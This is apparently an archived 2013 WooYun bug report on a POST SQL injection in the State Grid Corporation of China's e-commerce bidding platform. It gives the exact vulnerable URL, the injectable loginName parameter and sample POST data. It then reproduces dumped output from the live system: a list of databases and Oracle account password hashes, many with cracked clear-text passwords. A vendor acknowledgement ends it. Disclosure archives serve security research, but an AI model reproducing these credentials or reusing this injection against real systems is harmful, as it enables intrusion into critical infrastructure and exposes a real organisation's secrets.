乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-07-04: 细节已通知厂商并且等待厂商处理中 2013-07-04: 厂商已经确认,细节仅向厂商公开 2013-07-14: 细节向核心白帽子及相关领域专家公开 2013-07-24: 细节向普通白帽子公开 2013-08-03: 细节向实习白帽子公开 2013-08-18: 细节向公众公开
国家电网公司某重要平台SQL注射漏洞
出现问题的是国家电网公司电子商务平台,涉及在线电子投标等重要业务POST SQL注射
https://ecp.sgcc.com.cn/BidUpgrade/SgccRecyclersModify?next=2POST DATA:password=12345678&loginName=12345678
available databases [25]:[*] APEX_030200[*] APPQOSSYS[*] B[*] BIDPRO2[*] BUYER[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] GOLDENGATE[*] MDSY[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] PATROL[*] SOURCING[*] STAR1[*] STAR2[*] SYS[*] SYSMAN[*] SYSTEM[*] WMSYS[*] XDB
database management system users password hashes:[*] ANONYMOUS [1]: password hash: anonymous[*] APEX_030200 [1]: password hash: F7599A99C9DEFCF6[*] APEX_PUBLIC_USER [1]: password hash: A07104683C8DC6AA[*] APPQOSSYS [1]: password hash: 519D632B7EE7F63A clear-text password: APPQOSSYS[*] BIDPRO [1]: password hash: 41A99F61848947D0[*] BIDPRO2 [1]: password hash: 4B8100F8ED7A9857 clear-text password: BIDPRO2[*] BUYER [1]: password hash: F15C947644911B1E[*] CTXSYS [1]: password hash: 71E687F036AD56E5 clear-text password: CHANGE_ON_INSTALL[*] DBSNMP [1]: password hash: FFF45BB2C0C327EC clear-text password: ORACLE[*] DIP [1]: password hash: CE4A36B8E06CA59C clear-text password: DIP[*] ECPBIUSER [1]: password hash: 14780BE41C64DB20 clear-text password: ECPBIUSER[*] EXFSYS [1]: password hash: 33C758A8E388D[*] FLOWS_FILES [1]: password hash: 01AE0330AF78EA86[*] GOLDENGATE [1]: password hash: 3D349C58F9250ABB clear-text password: GOLDENGATE[*] MDDATA [1]: password hash: DF02A496267DEE66 clear-text password: MDDATA[*] MDSYS [1]: password hash: 72979A94BAD2AF80 clear-text password: MDSYS[*] MGMT_VIEW [1]: password hash: F1D1680A130E[*] OLAPSYS [1]: password hash: 4AC23CC3B15E2208[*] ORACLE_OCM [1]: password hash: 5A2E026A9157958C[*] ORDDATA [1]: password hash: A93EC937FCD1DC2A clear-text password: ORDDATA[*] ORDPLUGINS [1]: password hash: 88A2B2C183431F00 clear-text password: ORDPLUGINS[*] ORDSYS [1]: password hash: 7EFA02EC7EA6B86F clear-text password: ORDSYS[*] OUTLN [1]: password hash: 4A3BA55E08595C81 clear-text password: OUTLN[*] OWBSYS [1]: password hash: 610A3C38F301776F clear-text password: OWBSYS[*] OWBSYS_AUDIT [1]: password hash: FD8C3D14F6B60015 clear-text password: OWBSYS_AUDIT[*] PATROL [1]: password hash: 0478B8F047DECC65 clear-text password: PATROL[*] SI_INFORMTN_SCHEMA [1]: password hash: 84B8CBCA4D477FA3 clear-text password: SI_INFORMTN_SCHEMA[*] SOURCING [1]: password hash: FB6C020D46C50754[*] SPATIAL_CSW_ADMIN_USR [1]: password hash: 1B290858DD14107E clear-text password: SPATIAL_CSW_ADMIN_USR[*] SPATIAL_WFS_ADMIN_USR [1]: password hash: 7117215D6BEE6E82 clear-text password: SPATIAL_WFS_ADMIN_USR[*] STAR1 [1]: password hash: 4D8450ECC8B577DD[*] STAR2 [1]: password hash: EEE6ACF7DA046F54[*] SYS [1]: password hash: DCB748A5BC5390F2 clear-text password: PASSWORD[*] SYSMAN [1]: password hash: 2[*] SYSTEM [1]: password hash: 2D594E86[*] WMSYS [1]: password hash: 7C9BA362F8314299 clear-text password: WMSYS[*] XDB [1]: password hash: 8[*] XS$NULL [1]: password hash: DC4FCC8CB69A6733
过滤参数loginName
危害等级:高
漏洞Rank:15
确认时间:2013-07-04 16:23
谢谢,尽快整改。
暂无